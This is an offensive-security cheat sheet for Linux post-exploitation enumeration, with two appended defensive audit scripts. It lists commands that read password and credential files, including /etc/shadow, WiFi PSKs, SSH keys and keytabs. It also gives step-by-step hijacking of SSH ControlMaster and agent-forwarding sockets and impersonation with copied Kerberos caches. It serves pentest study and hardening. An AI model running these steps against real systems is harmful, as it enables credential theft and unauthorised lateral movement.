Linux

Introduction

This section contains useful commands for enumerating a Linux system and gathering information that supports later privilege escalation or lateral movement.

User and group enumeration

  • Print real and effective user and group IDs from the current user: id

  • List all users, groups and shells for each user: cat /etc/passwd

  • List user accounts that do not require a password:

sudo awk -F: '($2==""){print}' /etc/shadow
  • List the allowed (and forbidden) commands for the invoking or specified (-u) user: sudo -l

  • List all existing groups: cat /etc/group | sort

  • Print executed commands (looking for credentials): cat ~/.bash_history or history

Operating System

  • Kernel version and architecture:

uname -a
  • Environment variables:

env

Network Enumeration

  • List network interfaces: ip -br a

  • List all connections: netstat -putona

  • List only listening ports: netstat -pluton or ss -pltn

  • List hardcoded domains: cat /etc/hosts

  • List iptables rules: iptables -L

  • Outgoing connections to a specific IP: ss -anpt | grep <NETWORK> | grep ESTAB

  • Real-time traffic monitoring: tcpdump -i <if> -s0 -n -vv

  • Obtain WiFi passwords: sudo grep psk= /etc/NetworkManager/system-connections/*

Files enumeration

Files owned by a user

There might be files owned by a specific user stored in hidden folders.

find / -type f \( -user <user> -o -group <group> \) 2>/dev/null | grep -v ^/proc

Modified files

There might be files being modified with a cronjob or during a workday.

find / -type f -newermt <start date range> ! -newermt <end date range>

Accessed files

There might be files being accessed with a cronjob or during a workday.

find / -type f -newerat <start date range> ! -newerat <end date range>

Disks

List the filesystems that are mounted at Linux startup.

cat /etc/fstab

Password Enumeration

Look for files that contain passwords or keys.

# Passwords
grep -rni '/' -e "passw" --color=always 2>/dev/null
cat ~/.bash_history | grep -i passw 
# Find SSH keys 
find / -type f -name id_rsa 2>/dev/null 
grep  -rnw '/' -ie "private key" --color=always 2>/dev/null

Cronjobs

List scheduled jobs.

cat /etc/crontab
crontab -l

SSH

  • Find SSH keys:

find /home/ -iname "id_rsa"
find /home/ -iname "*.key"

Control Master

When ControlMaster is enabled, the initial SSH connection (the master connection) is established, and subsequent connections (slave connections) can reuse the existing master connection. This can lead to faster connection times and reduced resource usage, especially when connecting to the same remote server multiple times.

If an attacker gains access to a system where SSH ControlMaster is in use, they might exploit the existing master connection to execute commands or perform other malicious activities without the need to authenticate repeatedly.

  1. Check whether the file ~/.ssh/config exists and contains the following configuration, which means that ControlMaster is enabled.

Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m
  2. Look for any active connection under ~/.ssh/controlmaster/.

offsec@controller:~$ ls -al ~/.ssh/controlmaster/
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 13:55 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec    0 May 13 13:55 offsec@linuxvictim:22
  3. Use the existing connection to perform lateral movement.

  • User: If you are the user to whom the connection file belongs, simply SSH to the session.

ssh offsec@linuxvictim
  • Root:

ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim

SSH Agent Forwarding

SSH Agent Forwarding allows the SSH-Agent on a local machine to be used for authentication when connecting to remote servers.

If an attacker gains access to a machine where Agent Forwarding is active, they might abuse the forwarded agent connection to authenticate to other machines.

Check whether ~/.ssh/config on the client contains ForwardAgent yes; the server's SSH configuration /etc/ssh/sshd_config must also have AllowAgentForwarding yes. Then, check whether there is any active connection.

ps aux | grep ssh
  • User: If you are the user to whom the connection belongs, simply execute the SSH command to access the other computer automatically.

  • Root: Inspect the processes with "ssh" in their name to find any open connections from the host. Using the usernames listed in these connections, we can run the pstree command to get the process ID (PID) values of the SSH processes.

pstree -p <USER> | grep ssh
sshd(15228)---bash(15229)---su(15241)---bash(15242)
sshd(16380)---bash(16381)

Then, we extract the SSH_AUTH_SOCK environment variable from their connection to obtain the stored SSH socket.

cat /proc/16381/environ

After that, we set SSH_AUTH_SOCK to that socket and list the identities the agent holds:

root@controller:~# SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l

Finally, we can try to access a target we already suspect the victim connects to, or look for clues that show where the victim is connecting.

ss -ntp  | grep 22 | grep -i ssh
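
From the defender's side, the Control Master and Agent Forwarding settings described above can be audited before anyone abuses them. The script below is an added example, not part of the original page; the function names and the jump.example host are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: flag the SSH settings discussed
# above. The caller supplies the configuration file paths.

# audit_ssh_config FILE: print "FINDING [host pattern] keyword value" for each
# connection-sharing or agent-forwarding option that is not set to "no".
audit_ssh_config() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }            # comments and blank lines
    {
        line = $0
        sub(/^[ \t]+/, "", line); sub(/[ \t]+$/, "", line)
        if (!match(line, /[ \t=]+/)) next        # keyword, separator, value
        key = tolower(substr(line, 1, RSTART - 1))
        val = substr(line, RSTART + RLENGTH)
        if (key == "host" || key == "match") { scope = val; next }
        if (key !~ /^(controlmaster|controlpersist|forwardagent)$/) next
        if (tolower(val) == "no") next
        printf "FINDING [%s] %s %s\n", (scope == "" ? "global" : scope), key, val
    }' "$1"
}

# audit_sshd_config FILE: sshd allows agent forwarding by default and uses the
# first value it reads, so report unless that value is an explicit "no".
# Simplification: Match blocks are not evaluated separately.
audit_sshd_config() {
    awk '
    tolower($1) == "allowagentforwarding" { v = tolower($2); exit }
    END {
        if (v != "no")
            print "FINDING [sshd] allowagentforwarding " (v == "" ? "unset (default yes)" : v)
    }' "$1"
}

# Constructed sample: the client configuration shown on this page plus a
# hypothetical host entry that forwards the agent.
sample=$(mktemp)
cat > "$sample" <<'EOF'
Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m
Host jump.example
        ForwardAgent yes
EOF
audit_ssh_config "$sample"
rm -f "$sample"
```

A finding scoped to Host * applies to every destination; limiting these options to the hosts that need them, and using a jump host (ssh -J) instead of agent forwarding, reduces what a compromised intermediate machine can reuse.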

Kerberos

Kerberos tickets can also be found on Linux machines that belong to Active Directory domains. Enumerating the machine looking for Kerberos information can be crucial to perform lateral movement to other machines on the domain.

  • Obtain domain information from the Kerberos configuration file.

cat /etc/krb5.conf
  • Find Kerberos user credential cache files.

find /tmp/ -type f -iname "*krb5cc_*" 2>/dev/null
  • Impersonate user using krb5cc_ files.

sudo cp /tmp/krb5cc_* /tmp/krb5cc_minenow
sudo chown <ATTACKER_USER>:<ATTACKER_USER> /tmp/krb5cc_minenow
kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow
klist
  • Find keytab files.

find / -type f -iname "*.keytab" 2>/dev/null
ls /etc/krb5.*
  • Extract keytab information like domain, service principal and NTLM hash.

python3 KeyTabExtract/keytabextract.py krb5.keytab 
  • List tickets currently stored in the user’s credential cache file.

klist
  • Convert a Mimikatz ticket to ccache.

ticketConverter.py adminWebSvc.kirbi adminWebSvc.ccache
export KRB5CCNAME=/var/www/html/OSEP/Challenge6/adminWebSvc.ccache
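
A detection counterpart to the credential cache steps above, as an added example that is not part of the original page: it reviews FILE-type caches in a directory such as /tmp. The function name and the three REVIEW heuristics are assumptions chosen for illustration, not rules defined by Kerberos.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: heuristic review of FILE-type
# Kerberos credential caches in a directory such as /tmp.

# audit_ccaches DIR: print a REVIEW line for each krb5cc_* file where
#   - the name carries no numeric UID (default caches are krb5cc_<uid>...),
#   - the owner differs from the UID in the name, or
#   - the mode is anything other than owner-only read/write.
audit_ccaches() {
    dir=$1
    for f in "$dir"/krb5cc_*; do
        [ -f "$f" ] || continue
        name_uid=$(printf '%s\n' "${f##*/}" |
            sed -n 's/^krb5cc_\([0-9][0-9]*\).*/\1/p')
        # ls -ldn: column 1 is the mode string, column 3 the numeric owner
        info=$(ls -ldn "$f" | awk '{ print substr($1, 1, 10), $3 }')
        perms=${info% *}
        owner=${info#* }
        if [ -z "$name_uid" ]; then
            echo "REVIEW $f: no UID in name (owner $owner)"
        elif [ "$name_uid" != "$owner" ]; then
            echo "REVIEW $f: named for UID $name_uid, owned by $owner"
        fi
        [ "$perms" = "-rw-------" ] ||
            echo "REVIEW $f: mode $perms is not owner-only"
    done
}

# Constructed sample directory: one normal cache, one copy with an arbitrary
# name like the krb5cc_minenow file above, and one world-readable cache.
demo=$(mktemp -d)
me=$(id -u)
touch "$demo/krb5cc_$me" "$demo/krb5cc_minenow" "$demo/krb5cc_${me}_shared"
chmod 600 "$demo/krb5cc_$me" "$demo/krb5cc_minenow"
chmod 644 "$demo/krb5cc_${me}_shared"
audit_ccaches "$demo"
rm -rf "$demo"
```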
